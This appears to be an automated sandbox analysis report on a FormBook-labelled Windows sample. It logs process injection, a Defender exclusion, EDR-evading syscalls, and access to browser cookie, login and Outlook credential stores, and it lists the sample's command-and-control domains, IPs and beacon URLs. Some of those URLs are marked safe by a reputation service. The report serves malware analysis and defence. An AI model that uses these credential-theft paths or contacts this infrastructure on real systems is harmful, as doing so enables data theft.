    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading
    312
    Process Injection
    1
    Masquerading
    1
    OS Credential Dumping
    121
    Security Software Discovery
    Remote Services1
    Email Collection
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Abuse Elevation Control Mechanism
    11
    Disable or Modify Tools
    LSASS Memory2
    Process Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    4
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    41
    Virtualization/Sandbox Evasion
    Security Account Manager41
    Virtualization/Sandbox Evasion
    SMB/Windows Admin Shares1
    Data from Local System
    5
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
    Process Injection
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture5
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information
    LSA Secrets2
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Abuse Elevation Control Mechanism
    Cached Domain Credentials113
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
    Obfuscated Files or Information
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
    Software Packing
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    DLL Side-Loading
    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555193 Sample: Item-RQF-9456786.exe Startdate: 13/11/2024 Architecture: WINDOWS Score: 100 37 www.ecojomos.xyz 2->37 39 www.sklad-iq.online 2->39 41 17 other IPs or domains 2->41 49 Suricata IDS alerts for network traffic 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected AntiVM3 2->53 57 4 other signatures 2->57 10 Item-RQF-9456786.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 37->55 process4 file5 35 C:\Users\user\...\Item-RQF-9456786.exe.log, ASCII 10->35 dropped 69 Adds a directory exclusion to Windows Defender 10->69 14 Item-RQF-9456786.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 14->71 19 LiiDBuNLRIYu.exe 14->19 injected 73 Loading BitLocker PowerShell Module 17->73 22 WmiPrvSE.exe 17->22         started        24 conhost.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 19->59 26 fontview.exe 13 19->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 LiiDBuNLRIYu.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 www.ecojomos.xyz 203.161.46.205, 49995, 49996, 49997 VNPT-AS-VNVNPTCorpVN Malaysia 29->43 45 www.madhf.tech 103.224.182.242, 50019, 50020, 50021 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 29->45 47 12 other IPs or domains 29->47 75 Found direct / indirect Syscall (likely to bypass EDR) 29->75 signatures15

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Item-RQF-9456786.exe39%ReversingLabsByteCode-MSIL.Backdoor.FormBook
    Item-RQF-9456786.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://www.7vh2wy.top/ocnr/0%Avira URL Cloudsafe
    http://www.717hy.net/k81y/0%Avira URL Cloudsafe
    https://parking.reg.ru/script/get_domain_data?domain_name=www.sklad-iq.online&rand=0%Avira URL Cloudsafe
    http://www.madhf.tech/p31e/?2J=L0%Avira URL Cloudsafe
    http://www.rtpwslot888gol.sbs/7arg/0%Avira URL Cloudsafe
    http://www.lsfanarolt.shop/b9df/0%Avira URL Cloudsafe
    http://www.sklad-iq.online/j4lg/0%Avira URL Cloudsafe
    http://www.atendefacil.info/ovl0/?2J=sybLtbK8r4s7cIP4xvr2i1/OgqOaozXkrfvLrO0saE7+04sBLyNlnPJsxyiJd448I0Eq3D8MalhBXQ7UwGRoDb3Yk8LIhQCUInzvAK5ePNY01KNz5a/RKEGS8umzny51vQ==&tXul=U2UloNhP0%Avira URL Cloudsafe
    http://www.rtpwslot888gol.sbs0%Avira URL Cloudsafe
    https://pepabo.com/0%Avira URL Cloudsafe
    http://www.mrpokrovskii.pro/i6b4/0%Avira URL Cloudsafe
    https://www.domeneshop.no/whois0%Avira URL Cloudsafe
    http://www.sklad-iq.online/j4lg/?tXul=U2UloNhP&2J=0mGuP4ABjbamojwwbGp4nd6DYCnF1PU82/RCQVDltajJwR32joy3yBdZ/4cT/JAxhTejF9/1KOpXB+u6q5pZeVP3rEdsFeaB8jVGPWY7QM3+gMMl8rd3lPw1Ny+3a69apQ==0%Avira URL Cloudsafe
    https://www.domainnameshop.com/whois0%Avira URL Cloudsafe
    http://www.717hy.net/k81y/?2J=ijzO5vt4Wia988ezl94/5B5fhr01XtFEJs702F2lFCeAUQR2wSJY5h+0sGUliGD5vvb7tm1pzcvQX+qpOWiQ3K4hemU8wbaBHwJuA5BCX/yteUBDcWPxvtRpccaohSYfjw==&tXul=U2UloNhP0%Avira URL Cloudsafe
    http://www.mdpc7.top/a4nt/0%Avira URL Cloudsafe
    http://www.ecojomos.xyz/uaef/0%Avira URL Cloudsafe
    http://www.bahaeng.com/7d81/?tXul=U2UloNhP&2J=rKnERuK87XwUpD46DfVgxrQvP3X7K9CGfDS22ViQ9f8p4xS2+clAvvHEJpZ8brBpsNS/kiukCkSqLcZJlXQs2/1YcKhhRt4ykNxCPrZ76z98Hxh/ipFlCU6POWu6VKl5iw==0%Avira URL Cloudsafe
    http://www.ecojomos.xyz/uaef/?2J=znvVMZI6wclGwSNQgZtr5fBMguex2NmDUWcQCD5rzoJFeirSAcNEfn/4jSETcpej++6Zf7EsBdpUeNRucPEp0Vp7Iz2INonuboPmggNf5Eh/heiOubkxKPwt67wGlkSjkQ==&tXul=U2UloNhP0%Avira URL Cloudsafe
    https://support.lolipop.jp/hc/ja/articles/3600491329530%Avira URL Cloudsafe
    http://www.madhf.tech/p31e/?2J=L+1a/BdGYszeAGcVS8K8+8pLLusK97ER9aBhPiMrG4kn6GD5PjBb9DoL0CFI31uDvMTM4NZQBreJcdqa1xIiIspx5ApjHldDKvBxAP0DMlqCnZV88rmUcHIUAjJk93smhg==&tXul=U2UloNhP0%Avira URL Cloudsafe
    http://www.7vh2wy.top/ocnr/?2J=6FyD7uZOrviJgscx3zDo9l3wDpxd2lbJ6NQik1x0LfmClWpek8Fmgw2VUsZOzaCZ8a9BTDMjp2431cAe4Zlp/DG/ZAZ2b2TXHQALvARevfDq7KvJw4eUAghtZHK7htMeug==&tXul=U2UloNhP0%Avira URL Cloudsafe
    http://www.129glenforest.com/jj95/0%Avira URL Cloudsafe
    http://www.grandesofertas.fun/cu92/0%Avira URL Cloudsafe
    https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=4040%Avira URL Cloudsafe
    http://www.lsfanarolt.shop/b9df/?2J=dUH3FVfSLAHIHBRMvvPQgLWf0KXIT0dr2Awu2k06qg9LbooImE5C092/euUAt8NBFlVUBHDmvHBa3+G+T/z9BT74tEsDe+Pl6mU5GIhBpG7WZgGiesGf3hUVa6du6lWzSg==&tXul=U2UloNhP0%Avira URL Cloudsafe
    http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif0%Avira URL Cloudsafe
    http://www.madhf.tech/p31e/0%Avira URL Cloudsafe
    http://www.mdpc7.top/a4nt/?2J=Y8ucfnop1/b3pfYFq01F/gO8ESspnEO25i/hccpQHURd3Ee6lJ0YewpZ26P6KIWp1n+YeG7L7VclPhA1nqTCAuTU030Z3lnUxyF2WW91OhunyyCxSBLPY4XFmWmPj9k/og==&tXul=U2UloNhP0%Avira URL Cloudsafe
    http://www.sankan-fukushi.info/p9qy/0%Avira URL Cloudsafe
    http://www.mrpokrovskii.pro/i6b4/?2J=rbSOGHQf+oAIPcBZM/BWO4v0sc0ZI7pa6YU0oIiGfR+Ewkw1zlM3KmPagJJbTGfXhG2rczLZFwuqulMMl1sHkUxyatg9ogB88gOJZKl7SEK9bLYaCAnWqdxVYxi0oqyA/g==&tXul=U2UloNhP0%Avira URL Cloudsafe
    https://www.domainnameshop.com/0%Avira URL Cloudsafe
    https://www.grandesofertas.fun/cu92/?2J=lsHwRlN9eHt1sCRZ6R6my3qo0uOsMlznhj79tynlIjZaDxATi7cI0dkl3mGb0%Avira URL Cloudsafe
    http://www.129glenforest.com/jj95/?2J=Pexrq8dBT+pohtdREgLaj2qM8aDHNwg4eoWqtxa3tUqS44OvUmk7LsvxHK5YH7fdz4458FvKpzVKrVQ2/F68/gTe2ya6Lr7IE54iaP1hci4bc8/+8Y3du4MuylwBJQVzoQ==&tXul=U2UloNhP0%Avira URL Cloudsafe
    http://www.sankan-fukushi.info/p9qy/?2J=szOnwbI0B7M9cMMwX4bDwuNgoUWUV7slIpLLNm8Tfpa5tKMeNeGfvlEASyf1bFN7LlEkU7ntq56NwT9FzvKbuwV8GB1U7lwGbSSnMTrnLCsmtu5+GLJZif51cB3zkwMvhA==&tXul=U2UloNhP0%Avira URL Cloudsafe
    http://shkip2dom.com/0%Avira URL Cloudsafe
    http://www.atendefacil.info/ovl0/0%Avira URL Cloudsafe
    https://static.minne.com/files/banner/minne_600x5000%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    www.sklad-iq.online
    194.58.112.174
    truetrue
      unknown
      domains-38.cribflyer.com
      50.18.131.220
      truetrue
        unknown
        www.madhf.tech
        103.224.182.242
        truetrue
          unknown
          www.7vh2wy.top
          20.2.249.7
          truetrue
            unknown
            www.rtpwslot888gol.sbs
            188.114.96.3
            truetrue
              unknown
              mmd.dnsmmd.com
              20.2.36.112
              truetrue
                unknown
                ssl.goentri.com
                76.223.74.74
                truetrue
                  unknown
                  www.bahaeng.com
                  185.134.245.113
                  truetrue
                    unknown
                    www.mrpokrovskii.pro
                    109.70.26.37
                    truetrue
                      unknown
                      www.ecojomos.xyz
                      203.161.46.205
                      truetrue
                        unknown
                        www.atendefacil.info
                        208.115.225.220
                        truetrue
                          unknown
                          www.717hy.net
                          68.66.226.92
                          truetrue
                            unknown
                            www.lsfanarolt.shop
                            172.67.197.57
                            truetrue
                              unknown
                              www.sankan-fukushi.info
                              163.44.185.183
                              truetrue
                                unknown
                                www.mdpc7.top
                                unknown
                                unknownfalse
                                  unknown
                                  www.129glenforest.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.grandesofertas.fun
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.joube.shop
                                      unknown
                                      unknownfalse
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.7vh2wy.top/ocnr/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.lsfanarolt.shop/b9df/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.717hy.net/k81y/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.rtpwslot888gol.sbs/7arg/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sklad-iq.online/j4lg/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.atendefacil.info/ovl0/?2J=sybLtbK8r4s7cIP4xvr2i1/OgqOaozXkrfvLrO0saE7+04sBLyNlnPJsxyiJd448I0Eq3D8MalhBXQ7UwGRoDb3Yk8LIhQCUInzvAK5ePNY01KNz5a/RKEGS8umzny51vQ==&tXul=U2UloNhPtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sklad-iq.online/j4lg/?tXul=U2UloNhP&2J=0mGuP4ABjbamojwwbGp4nd6DYCnF1PU82/RCQVDltajJwR32joy3yBdZ/4cT/JAxhTejF9/1KOpXB+u6q5pZeVP3rEdsFeaB8jVGPWY7QM3+gMMl8rd3lPw1Ny+3a69apQ==true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.mrpokrovskii.pro/i6b4/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.mdpc7.top/a4nt/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.ecojomos.xyz/uaef/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.ecojomos.xyz/uaef/?2J=znvVMZI6wclGwSNQgZtr5fBMguex2NmDUWcQCD5rzoJFeirSAcNEfn/4jSETcpej++6Zf7EsBdpUeNRucPEp0Vp7Iz2INonuboPmggNf5Eh/heiOubkxKPwt67wGlkSjkQ==&tXul=U2UloNhPtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.717hy.net/k81y/?2J=ijzO5vt4Wia988ezl94/5B5fhr01XtFEJs702F2lFCeAUQR2wSJY5h+0sGUliGD5vvb7tm1pzcvQX+qpOWiQ3K4hemU8wbaBHwJuA5BCX/yteUBDcWPxvtRpccaohSYfjw==&tXul=U2UloNhPtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.madhf.tech/p31e/?2J=L+1a/BdGYszeAGcVS8K8+8pLLusK97ER9aBhPiMrG4kn6GD5PjBb9DoL0CFI31uDvMTM4NZQBreJcdqa1xIiIspx5ApjHldDKvBxAP0DMlqCnZV88rmUcHIUAjJk93smhg==&tXul=U2UloNhPtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.bahaeng.com/7d81/?tXul=U2UloNhP&2J=rKnERuK87XwUpD46DfVgxrQvP3X7K9CGfDS22ViQ9f8p4xS2+clAvvHEJpZ8brBpsNS/kiukCkSqLcZJlXQs2/1YcKhhRt4ykNxCPrZ76z98Hxh/ipFlCU6POWu6VKl5iw==true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.grandesofertas.fun/cu92/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.7vh2wy.top/ocnr/?2J=6FyD7uZOrviJgscx3zDo9l3wDpxd2lbJ6NQik1x0LfmClWpek8Fmgw2VUsZOzaCZ8a9BTDMjp2431cAe4Zlp/DG/ZAZ2b2TXHQALvARevfDq7KvJw4eUAghtZHK7htMeug==&tXul=U2UloNhPtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.129glenforest.com/jj95/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.lsfanarolt.shop/b9df/?2J=dUH3FVfSLAHIHBRMvvPQgLWf0KXIT0dr2Awu2k06qg9LbooImE5C092/euUAt8NBFlVUBHDmvHBa3+G+T/z9BT74tEsDe+Pl6mU5GIhBpG7WZgGiesGf3hUVa6du6lWzSg==&tXul=U2UloNhPtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sankan-fukushi.info/p9qy/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.madhf.tech/p31e/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.mrpokrovskii.pro/i6b4/?2J=rbSOGHQf+oAIPcBZM/BWO4v0sc0ZI7pa6YU0oIiGfR+Ewkw1zlM3KmPagJJbTGfXhG2rczLZFwuqulMMl1sHkUxyatg9ogB88gOJZKl7SEK9bLYaCAnWqdxVYxi0oqyA/g==&tXul=U2UloNhPtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.mdpc7.top/a4nt/?2J=Y8ucfnop1/b3pfYFq01F/gO8ESspnEO25i/hccpQHURd3Ee6lJ0YewpZ26P6KIWp1n+YeG7L7VclPhA1nqTCAuTU030Z3lnUxyF2WW91OhunyyCxSBLPY4XFmWmPj9k/og==&tXul=U2UloNhPtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sankan-fukushi.info/p9qy/?2J=szOnwbI0B7M9cMMwX4bDwuNgoUWUV7slIpLLNm8Tfpa5tKMeNeGfvlEASyf1bFN7LlEkU7ntq56NwT9FzvKbuwV8GB1U7lwGbSSnMTrnLCsmtu5+GLJZif51cB3zkwMvhA==&tXul=U2UloNhPtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.129glenforest.com/jj95/?2J=Pexrq8dBT+pohtdREgLaj2qM8aDHNwg4eoWqtxa3tUqS44OvUmk7LsvxHK5YH7fdz4458FvKpzVKrVQ2/F68/gTe2ya6Lr7IE54iaP1hci4bc8/+8Y3du4MuylwBJQVzoQ==&tXul=U2UloNhPtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.atendefacil.info/ovl0/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabfontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://reg.rufontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpfalse
                                              high
                                              https://parking.reg.ru/script/get_domain_data?domain_name=www.sklad-iq.online&rand=fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.reg.ru/whois/?check=&dname=www.sklad-iq.online&amp;reg_source=parking_autofontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                high
                                                http://www.madhf.tech/p31e/?2J=LLiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003DBA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://lolipop.jp/fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    high
                                                    https://pepabo.com/fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.reg.ru/dedicated/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      high
                                                      http://www.rtpwslot888gol.sbsLiiDBuNLRIYu.exe, 0000000B.00000002.4743693637.0000000004D2A000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssfontview.exe, 0000000A.00000002.4743802201.0000000005FFC000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000032BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          high
                                                          https://www.domeneshop.no/whoisfontview.exe, 0000000A.00000002.4743802201.00000000059B4000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000A.00000002.4745385758.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002C74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2853024183.000000000A014000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameItem-RQF-9456786.exe, 00000000.00000002.2271370211.0000000002A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.domainnameshop.com/whoisfirefox.exe, 0000000C.00000002.2853024183.000000000A014000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://support.lolipop.jp/hc/ja/articles/360049132953fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://ik.imgkit.net/u1sv5cu4wfj/cribflyer-photos/tr:w-2000fontview.exe, 0000000A.00000002.4743802201.00000000067D6000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003A96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icofontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.reg.ru/domain/new/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_landfontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.giffontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.ecosia.org/newtab/fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.reg.ru/hosting/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_hofontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://ac.ecosia.org/autocomplete?q=fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.grandesofertas.fun/cu92/?2J=lsHwRlN9eHt1sCRZ6R6my3qo0uOsMlznhj79tynlIjZaDxATi7cI0dkl3mGbfontview.exe, 0000000A.00000002.4743802201.0000000006C8C000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003F4C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
